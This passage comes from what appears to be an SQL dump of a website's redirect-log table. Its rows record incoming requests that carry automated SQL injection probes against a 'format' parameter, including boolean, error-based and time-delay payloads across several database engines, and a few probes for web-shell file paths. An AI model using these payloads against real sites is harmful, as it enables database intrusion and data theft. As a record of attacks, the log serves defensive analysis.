\'czrw&type=rss',NULL,'','',1,0,'2024-06-15 16:06:57','0000-00-00 00:00:00',301),(35123,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/waitfor/**/delay/**/\'0:0:5\'/**/and	\'csuc\'/**/like	\'csuc&type=rss',NULL,'','',1,0,'2024-06-15 16:06:58','0000-00-00 00:00:00',301),(35124,'https://www.3s-technologies.com.tr/en/?format=feed)/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(6535/**/between	6535/**/and	6535&type=rss',NULL,'','',1,0,'2024-06-15 16:06:59','0000-00-00 00:00:00',301),(35125,'https://www.3s-technologies.com.tr/en/?format=feed/**/waitfor/**/delay/**/\'0:0:5\'&type=rss',NULL,'','',2,0,'2024-06-15 16:07:01','0000-00-00 00:00:00',301),(35126,'https://www.3s-technologies.com.tr/en/?format=feed/**/waitfor/**/delay/**/\'0:0:5\'--/**/qnpb&type=rss',NULL,'','',1,0,'2024-06-15 16:07:02','0000-00-00 00:00:00',301),(35127,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	5154/**/like	dbms_pipe.receive_message(chr(72)||chr(120)||chr(86)||chr(114),5)/**/and	(\'crsh\'/**/like	\'crsh&type=rss',NULL,'','',1,0,'2024-06-15 16:07:03','0000-00-00 00:00:00',301),(35128,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	5154/**/like	dbms_pipe.receive_message(chr(72)||chr(120)||chr(86)||chr(114),5)/**/and	\'zcub\'/**/like	\'zcub&type=rss',NULL,'','',1,0,'2024-06-15 16:07:06','0000-00-00 00:00:00',301),(35129,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	5154/**/like	dbms_pipe.receive_message(chr(72)||chr(120)||chr(86)||chr(114),5)/**/and	(7630/**/between	7630/**/and	7630&type=rss',NULL,'','',1,0,'2024-06-15 16:07:07','0000-00-00 00:00:00',301),(35130,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5154/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(72)||chr(120)||chr(86)||chr(114),5)&type=rss',NULL,'','',1,0,'2024-06-15 16:07:08','0000-00-00 00:00:00',301),(35131,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5154/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(72)||chr(120)||chr(86)||chr(114),5)--/**/jsrd&type=rss',NULL,'','',1,0,'2024-06-15 16:07:10','0000-00-00 00:00:00',301),(35132,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/order	by	1--/**/hxhw&type=rss',NULL,'','',1,0,'2024-06-15 16:07:11','0000-00-00 00:00:00',301),(35133,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/order	by	1--/**/jmvp&type=rss',NULL,'','',1,0,'2024-06-15 16:07:12','0000-00-00 00:00:00',301),(35134,'https://www.3s-technologies.com.tr/en/?format=feed)/**/order	by	1--/**/pvmf&type=rss',NULL,'','',1,0,'2024-06-15 16:07:14','0000-00-00 00:00:00',301),(35135,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	1--/**/tqhh&type=rss',NULL,'','',1,0,'2024-06-15 16:07:15','0000-00-00 00:00:00',301),(35136,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	1--/**/shcr&type=rss',NULL,'','',1,0,'2024-06-15 16:07:17','0000-00-00 00:00:00',301),(35137,'http://3s-technologies.com.tr/tr/wp-content/themes/jaida/lang.php',NULL,'','',14,0,'2024-06-15 21:18:47','0000-00-00 00:00:00',301),(35138,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/mini.php',NULL,'','',24,0,'2024-06-15 21:18:49','0000-00-00 00:00:00',301),(35139,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell/about.php',NULL,'','',4,0,'2024-06-15 21:18:56','0000-00-00 00:00:00',301),(35140,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=2308',NULL,'','',1,0,'2024-06-17 04:32:12','0000-00-00 00:00:00',301),(35141,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'mjaexj<\'\">ckmvbv',NULL,'','',1,0,'2024-06-17 04:32:15','0000-00-00 00:00:00',301),(35142,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	4022/**/like	6603/**/and	(\'crgy\'/**/like	\'crgy',NULL,'','',1,0,'2024-06-17 04:32:17','0000-00-00 00:00:00',301),(35143,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	9239/**/like	9239/**/and	(\'dtns\'/**/like	\'dtns',NULL,'','',1,0,'2024-06-17 04:32:19','0000-00-00 00:00:00',301),(35144,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	3803/**/like	2162/**/and	\'oxlo\'/**/like	\'oxlo',NULL,'','',1,0,'2024-06-17 04:32:20','0000-00-00 00:00:00',301),(35145,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	9239/**/like	9239/**/and	\'lpqz\'/**/like	\'lpqz',NULL,'','',1,0,'2024-06-17 04:32:21','0000-00-00 00:00:00',301),(35146,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	7618/**/like	5074/**/and	(2548/**/between	2548/**/and	2548',NULL,'','',1,0,'2024-06-17 04:32:22','0000-00-00 00:00:00',301),(35147,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	9239/**/like	9239/**/and	(4595/**/between	4595/**/and	4595',NULL,'','',1,0,'2024-06-17 04:32:24','0000-00-00 00:00:00',301),(35148,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	4926/**/between	2849/**/and	2849',NULL,'','',1,0,'2024-06-17 04:32:25','0000-00-00 00:00:00',301),(35149,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9239/**/between	9239/**/and	9239',NULL,'','',1,0,'2024-06-17 04:32:26','0000-00-00 00:00:00',301),(35150,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9043/**/between	6664/**/and	6664--/**/zpyt',NULL,'','',1,0,'2024-06-17 04:32:27','0000-00-00 00:00:00',301),(35151,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9239/**/between	9239/**/and	9239--/**/wiud',NULL,'','',1,0,'2024-06-17 04:32:29','0000-00-00 00:00:00',301),(35152,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	(case	when	(2223/**/like	1963)/**/then	\'opensearch\'/**/else	(select	1963/**/union	select	2601)/**/end	))',NULL,'','',1,0,'2024-06-17 04:32:30','0000-00-00 00:00:00',301),(35153,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	(case	when	(4196/**/like	4196)/**/then	\'opensearch\'/**/else	(select	2375/**/union	select	2278)/**/end	))',NULL,'','',1,0,'2024-06-17 04:32:31','0000-00-00 00:00:00',301),(35154,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	extractvalue(7385,concat(0x5c,0x71766a6271,(select	(elt(7385/**/like	7385,1))),0x71716b7671))/**/and	(\'llrw\'/**/like	\'llrw',NULL,'','',1,0,'2024-06-17 04:32:32','0000-00-00 00:00:00',301),(35155,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	extractvalue(7385,concat(0x5c,0x71766a6271,(select	(elt(7385/**/like	7385,1))),0x71716b7671))/**/and	\'kmkz\'/**/like	\'kmkz',NULL,'','',1,0,'2024-06-17 04:32:34','0000-00-00 00:00:00',301),(35156,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	extractvalue(7385,concat(0x5c,0x71766a6271,(select	(elt(7385/**/like	7385,1))),0x71716b7671))/**/and	(5179/**/between	5179/**/and	5179',NULL,'','',1,0,'2024-06-17 04:32:35','0000-00-00 00:00:00',301),(35157,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	extractvalue(7385,concat(0x5c,0x71766a6271,(select	(elt(7385/**/between	7385/**/and	7385,1))),0x71716b7671))',NULL,'','',1,0,'2024-06-17 04:32:36','0000-00-00 00:00:00',301),(35158,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	extractvalue(7385,concat(0x5c,0x71766a6271,(select	(elt(7385/**/between	7385/**/and	7385,1))),0x71716b7671))--/**/ocxy',NULL,'','',1,0,'2024-06-17 04:32:37','0000-00-00 00:00:00',301),(35159,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	7789/**/like	cast((chr(113)||chr(118)||chr(106)||chr(98)||chr(113))||(select	(case	when	(7789/**/like	7789)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(113)||chr(107)||chr(118)||chr(113))/**/as	numeric	)/**/and	(\'bpbt\'/**/like	\'bpbt',NULL,'','',1,0,'2024-06-17 04:32:39','0000-00-00 00:00:00',301),(35160,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	7789/**/like	cast((chr(113)||chr(118)||chr(106)||chr(98)||chr(113))||(select	(case	when	(7789/**/like	7789)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(113)||chr(107)||chr(118)||chr(113))/**/as	numeric	)/**/and	\'uory\'/**/like	\'uory',NULL,'','',1,0,'2024-06-17 04:32:40','0000-00-00 00:00:00',301),(35161,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	7789/**/like	cast((chr(113)||chr(118)||chr(106)||chr(98)||chr(113))||(select	(case	when	(7789/**/like	7789)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(113)||chr(107)||chr(118)||chr(113))/**/as	numeric	)/**/and	(8966/**/between	8966/**/and	8966',NULL,'','',1,0,'2024-06-17 04:32:41','0000-00-00 00:00:00',301),(35162,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7789/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(118)||chr(106)||chr(98)||chr(113))||(select	(case	when	(7789/**/like	7789)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(113)||chr(107)||chr(118)||chr(113))/**/as	numeric	)',NULL,'','',1,0,'2024-06-17 04:32:42','0000-00-00 00:00:00',301),(35163,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7789/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(118)||chr(106)||chr(98)||chr(113))||(select	(case	when	(7789/**/like	7789)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(113)||chr(107)||chr(118)||chr(113))/**/as	numeric	)--/**/nneh',NULL,'','',1,0,'2024-06-17 04:32:44','0000-00-00 00:00:00',301),(35164,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	1025/**/in	(select	(char(113)+char(118)+char(106)+char(98)+char(113)+(select	(case	when	(1025/**/like	1025)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(113)+char(107)+char(118)+char(113)))/**/and	(\'sndb\'/**/like	\'sndb',NULL,'','',1,0,'2024-06-17 04:32:45','0000-00-00 00:00:00',301),(35165,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	1025/**/in	(select	(char(113)+char(118)+char(106)+char(98)+char(113)+(select	(case	when	(1025/**/like	1025)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(113)+char(107)+char(118)+char(113)))/**/and	\'ixha\'/**/like	\'ixha',NULL,'','',1,0,'2024-06-17 04:32:46','0000-00-00 00:00:00',301),(35166,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	1025/**/in	(select	(char(113)+char(118)+char(106)+char(98)+char(113)+(select	(case	when	(1025/**/like	1025)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(113)+char(107)+char(118)+char(113)))/**/and	(5414/**/between	5414/**/and	5414',NULL,'','',1,0,'2024-06-17 04:32:47','0000-00-00 00:00:00',301),(35167,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	1025/**/in	(select	(char(113)+char(118)+char(106)+char(98)+char(113)+(select	(case	when	(1025/**/between	1025)/**/and	1025)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(113)+char(107)+char(118)+char(113)))',NULL,'','',1,0,'2024-06-17 04:32:49','0000-00-00 00:00:00',301),(35168,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	1025/**/in	(select	(char(113)+char(118)+char(106)+char(98)+char(113)+(select	(case	when	(1025/**/between	1025)/**/and	1025)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(113)+char(107)+char(118)+char(113)))--/**/eibd',NULL,'','',1,0,'2024-06-17 04:32:50','0000-00-00 00:00:00',301),(35169,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	7884/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(118)||chr(106)||chr(98)||chr(113)||(select	(case	when	(7884/**/like	7884)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(113)||chr(107)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	(\'oena\'/**/like	\'oena',NULL,'','',1,0,'2024-06-17 04:32:51','0000-00-00 00:00:00',301),(35170,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	7884/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(118)||chr(106)||chr(98)||chr(113)||(select	(case	when	(7884/**/like	7884)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(113)||chr(107)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	\'kpld\'/**/like	\'kpld',NULL,'','',1,0,'2024-06-17 04:32:52','0000-00-00 00:00:00',301),(35171,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	7884/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(118)||chr(106)||chr(98)||chr(113)||(select	(case	when	(7884/**/like	7884)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(113)||chr(107)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	(7287/**/between	7287/**/and	7287',NULL,'','',1,0,'2024-06-17 04:32:54','0000-00-00 00:00:00',301),(35172,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7884/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(118)||chr(106)||chr(98)||chr(113)||(select	(case	when	(7884/**/like	7884)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(113)||chr(107)||chr(118)||chr(113)||chr(62)))/**/from	dual	)',NULL,'','',1,0,'2024-06-17 04:32:55','0000-00-00 00:00:00',301),(35173,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7884/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(118)||chr(106)||chr(98)||chr(113)||(select	(case	when	(7884/**/like	7884)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(113)||chr(107)||chr(118)||chr(113)||chr(62)))/**/from	dual	)--/**/qugu',NULL,'','',1,0,'2024-06-17 04:32:56','0000-00-00 00:00:00',301),(35174,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	concat(concat(\'qvjbq\',(case	when	(6431/**/like	6431)/**/then	\'1\'/**/else	\'0\'/**/end	)),\'qqkvq\'))',NULL,'','',1,0,'2024-06-17 04:32:57','0000-00-00 00:00:00',301),(35175,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\');select	dbms_pipe.receive_message(chr(82)||chr(118)||chr(100)||chr(75),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-17 04:33:09','0000-00-00 00:00:00',301),(35176,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\';select	dbms_pipe.receive_message(chr(82)||chr(118)||chr(100)||chr(75),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-17 04:33:10','0000-00-00 00:00:00',301),(35177,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch);select	dbms_pipe.receive_message(chr(82)||chr(118)||chr(100)||chr(75),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-17 04:33:11','0000-00-00 00:00:00',301),(35178,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch;select	dbms_pipe.receive_message(chr(82)||chr(118)||chr(100)||chr(75),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-17 04:33:13','0000-00-00 00:00:00',301),(35179,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	(select	7685/**/from	(select(sleep(5)))zdcx)/**/and	(\'wtdm\'/**/like	\'wtdm',NULL,'','',1,0,'2024-06-17 04:33:14','0000-00-00 00:00:00',301),(35180,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	(select	7685/**/from	(select(sleep(5)))zdcx)/**/and	\'droq\'/**/like	\'droq',NULL,'','',1,0,'2024-06-17 04:33:15','0000-00-00 00:00:00',301),(35181,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	(select	7685/**/from	(select(sleep(5)))zdcx)/**/and	(9684/**/between	9684/**/and	9684',NULL,'','',1,0,'2024-06-17 04:33:17','0000-00-00 00:00:00',301),(35182,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	(select	7685/**/from	(select(sleep(5)))zdcx)',NULL,'','',1,0,'2024-06-17 04:33:18','0000-00-00 00:00:00',301),(35183,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	(select	7685/**/from	(select(sleep(5)))zdcx)--/**/bgdi',NULL,'','',1,0,'2024-06-17 04:33:19','0000-00-00 00:00:00',301),(35184,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	5175/**/like	(select	5175/**/from	pg_sleep(5))/**/and	(\'kbsc\'/**/like	\'kbsc',NULL,'','',1,0,'2024-06-17 04:33:20','0000-00-00 00:00:00',301),(35185,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	5175/**/like	(select	5175/**/from	pg_sleep(5))/**/and	\'pell\'/**/like	\'pell',NULL,'','',1,0,'2024-06-17 04:33:21','0000-00-00 00:00:00',301),(35186,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	5175/**/like	(select	5175/**/from	pg_sleep(5))/**/and	(5054/**/between	5054/**/and	5054',NULL,'','',1,0,'2024-06-17 04:33:23','0000-00-00 00:00:00',301),(35187,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	5175/**/between	(select	and	(select5175/**/from	pg_sleep(5))',NULL,'','',1,0,'2024-06-17 04:33:24','0000-00-00 00:00:00',301),(35188,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	5175/**/between	(select	and	(select5175/**/from	pg_sleep(5))--/**/rwgj',NULL,'','',1,0,'2024-06-17 04:33:25','0000-00-00 00:00:00',301),(35189,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(\'ilzu\'/**/like	\'ilzu',NULL,'','',1,0,'2024-06-17 04:33:27','0000-00-00 00:00:00',301),(35190,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/waitfor/**/delay/**/\'0:0:5\'/**/and	\'hjva\'/**/like	\'hjva',NULL,'','',1,0,'2024-06-17 04:33:28','0000-00-00 00:00:00',301),(35191,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(1057/**/between	1057/**/and	1057',NULL,'','',1,0,'2024-06-17 04:33:29','0000-00-00 00:00:00',301),(35192,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/waitfor/**/delay/**/\'0:0:5\'--/**/zmka',NULL,'','',1,0,'2024-06-17 04:33:32','0000-00-00 00:00:00',301),(35193,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	9779/**/like	dbms_pipe.receive_message(chr(100)||chr(84)||chr(85)||chr(104),5)/**/and	(\'pzga\'/**/like	\'pzga',NULL,'','',1,0,'2024-06-17 04:33:33','0000-00-00 00:00:00',301),(35194,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	9779/**/like	dbms_pipe.receive_message(chr(100)||chr(84)||chr(85)||chr(104),5)/**/and	\'minb\'/**/like	\'minb',NULL,'','',1,0,'2024-06-17 04:33:34','0000-00-00 00:00:00',301),(35195,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	9779/**/like	dbms_pipe.receive_message(chr(100)||chr(84)||chr(85)||chr(104),5)/**/and	(9053/**/between	9053/**/and	9053',NULL,'','',1,0,'2024-06-17 04:33:35','0000-00-00 00:00:00',301),(35196,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9779/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(100)||chr(84)||chr(85)||chr(104),5)',NULL,'','',1,0,'2024-06-17 04:33:37','0000-00-00 00:00:00',301),(35197,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9779/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(100)||chr(84)||chr(85)||chr(104),5)--/**/sgra',NULL,'','',1,0,'2024-06-17 04:33:38','0000-00-00 00:00:00',301),(35198,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/order	by	1--/**/vixy',NULL,'','',1,0,'2024-06-17 04:33:39','0000-00-00 00:00:00',301),(35199,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/order	by	1--/**/olca',NULL,'','',1,0,'2024-06-17 04:33:41','0000-00-00 00:00:00',301),(35200,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/order	by	1--/**/osmv',NULL,'','',1,0,'2024-06-17 04:33:42','0000-00-00 00:00:00',301),(35201,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/order	by	1--/**/ojkf',NULL,'','',1,0,'2024-06-17 04:33:43','0000-00-00 00:00:00',301),(35202,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/order	by	1--/**/pyvz',NULL,'','',1,0,'2024-06-17 04:33:45','0000-00-00 00:00:00',301),(35203,'https://www.3s-technologies.com.tr/en/?format=7857&type=rss',NULL,'','',1,0,'2024-06-17 05:45:51','0000-00-00 00:00:00',301),(35204,'https://www.3s-technologies.com.tr/en/?format=feed\'yxcjfo<\'\">xphvis&type=rss',NULL,'','',1,0,'2024-06-17 05:45:54','0000-00-00 00:00:00',301),(35205,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	8174/**/like	4679/**/and	(\'nyiz\'/**/like	\'nyiz&type=rss',NULL,'','',1,0,'2024-06-17 05:45:57','0000-00-00 00:00:00',301),(35206,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	6878/**/like	6878/**/and	(\'yyci\'/**/like	\'yyci&type=rss',NULL,'','',1,0,'2024-06-17 05:45:58','0000-00-00 00:00:00',301),(35207,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	1529/**/like	6103/**/and	\'nieo\'/**/like	\'nieo&type=rss',NULL,'','',1,0,'2024-06-17 05:45:59','0000-00-00 00:00:00',301),(35208,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	6878/**/like	6878/**/and	\'mudb\'/**/like	\'mudb&type=rss',NULL,'','',1,0,'2024-06-17 05:46:00','0000-00-00 00:00:00',301),(35209,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	8952/**/like	6382/**/and	(1849/**/between	1849/**/and	1849&type=rss',NULL,'','',1,0,'2024-06-17 05:46:02','0000-00-00 00:00:00',301),(35210,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	6878/**/like	6878/**/and	(4684/**/between	4684/**/and	4684&type=rss',NULL,'','',1,0,'2024-06-17 05:46:03','0000-00-00 00:00:00',301),(35211,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	4177/**/between	4231/**/and	4231&type=rss',NULL,'','',1,0,'2024-06-17 05:46:04','0000-00-00 00:00:00',301),(35212,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	6878/**/between	6878/**/and	6878&type=rss',NULL,'','',1,0,'2024-06-17 05:46:06','0000-00-00 00:00:00',301),(35213,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	2762/**/between	7092/**/and	7092--/**/zsnk&type=rss',NULL,'','',1,0,'2024-06-17 05:46:07','0000-00-00 00:00:00',301),(35214,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	6878/**/between	6878/**/and	6878--/**/qzsk&type=rss',NULL,'','',1,0,'2024-06-17 05:46:08','0000-00-00 00:00:00',301),(35215,'https://www.3s-technologies.com.tr/en/?format=(select	(case	when	(7132/**/like	9758)/**/then	\'feed\'/**/else	(select	9758/**/union	select	6516)/**/end	))&type=rss',NULL,'','',1,0,'2024-06-17 05:46:09','0000-00-00 00:00:00',301),(35216,'https://www.3s-technologies.com.tr/en/?format=(select	(case	when	(2934/**/like	2934)/**/then	\'feed\'/**/else	(select	3386/**/union	select	7191)/**/end	))&type=rss',NULL,'','',1,0,'2024-06-17 05:46:11','0000-00-00 00:00:00',301),(35217,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	extractvalue(8782,concat(0x5c,0x717a6a6b71,(select	(elt(8782/**/like	8782,1))),0x71707a7671))/**/and	(\'qmot\'/**/like	\'qmot&type=rss',NULL,'','',1,0,'2024-06-17 05:46:12','0000-00-00 00:00:00',301),(35218,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	extractvalue(8782,concat(0x5c,0x717a6a6b71,(select	(elt(8782/**/like	8782,1))),0x71707a7671))/**/and	\'jnse\'/**/like	\'jnse&type=rss',NULL,'','',1,0,'2024-06-17 05:46:13','0000-00-00 00:00:00',301),(35219,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	extractvalue(8782,concat(0x5c,0x717a6a6b71,(select	(elt(8782/**/like	8782,1))),0x71707a7671))/**/and	(8091/**/between	8091/**/and	8091&type=rss',NULL,'','',1,0,'2024-06-17 05:46:15','0000-00-00 00:00:00',301),(35220,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	extractvalue(8782,concat(0x5c,0x717a6a6b71,(select	(elt(8782/**/between	8782/**/and	8782,1))),0x71707a7671))&type=rss',NULL,'','',1,0,'2024-06-17 05:46:16','0000-00-00 00:00:00',301),(35221,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	extractvalue(8782,concat(0x5c,0x717a6a6b71,(select	(elt(8782/**/between	8782/**/and	8782,1))),0x71707a7671))--/**/coqk&type=rss',NULL,'','',1,0,'2024-06-17 05:46:17','0000-00-00 00:00:00',301),(35222,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	5823/**/like	cast((chr(113)||chr(122)||chr(106)||chr(107)||chr(113))||(select	(case	when	(5823/**/like	5823)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(112)||chr(122)||chr(118)||chr(113))/**/as	numeric	)/**/and	(\'dxbx\'/**/like	\'dxbx&type=rss',NULL,'','',1,0,'2024-06-17 05:46:19','0000-00-00 00:00:00',301),(35223,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	5823/**/like	cast((chr(113)||chr(122)||chr(106)||chr(107)||chr(113))||(select	(case	when	(5823/**/like	5823)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(112)||chr(122)||chr(118)||chr(113))/**/as	numeric	)/**/and	\'syzq\'/**/like	\'syzq&type=rss',NULL,'','',1,0,'2024-06-17 05:46:20','0000-00-00 00:00:00',301),(35224,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	5823/**/like	cast((chr(113)||chr(122)||chr(106)||chr(107)||chr(113))||(select	(case	when	(5823/**/like	5823)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(112)||chr(122)||chr(118)||chr(113))/**/as	numeric	)/**/and	(4296/**/between	4296/**/and	4296&type=rss',NULL,'','',1,0,'2024-06-17 05:46:21','0000-00-00 00:00:00',301),(35225,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5823/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(122)||chr(106)||chr(107)||chr(113))||(select	(case	when	(5823/**/like	5823)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(112)||chr(122)||chr(118)||chr(113))/**/as	numeric	)&type=rss',NULL,'','',1,0,'2024-06-17 05:46:22','0000-00-00 00:00:00',301),(35226,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5823/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(122)||chr(106)||chr(107)||chr(113))||(select	(case	when	(5823/**/like	5823)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(112)||chr(122)||chr(118)||chr(113))/**/as	numeric	)--/**/mvtt&type=rss',NULL,'','',1,0,'2024-06-17 05:46:24','0000-00-00 00:00:00',301),(35227,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	5759/**/in	(select	(char(113)+char(122)+char(106)+char(107)+char(113)+(select	(case	when	(5759/**/like	5759)/**/then	char(49)/**/else	char(48)/**/end	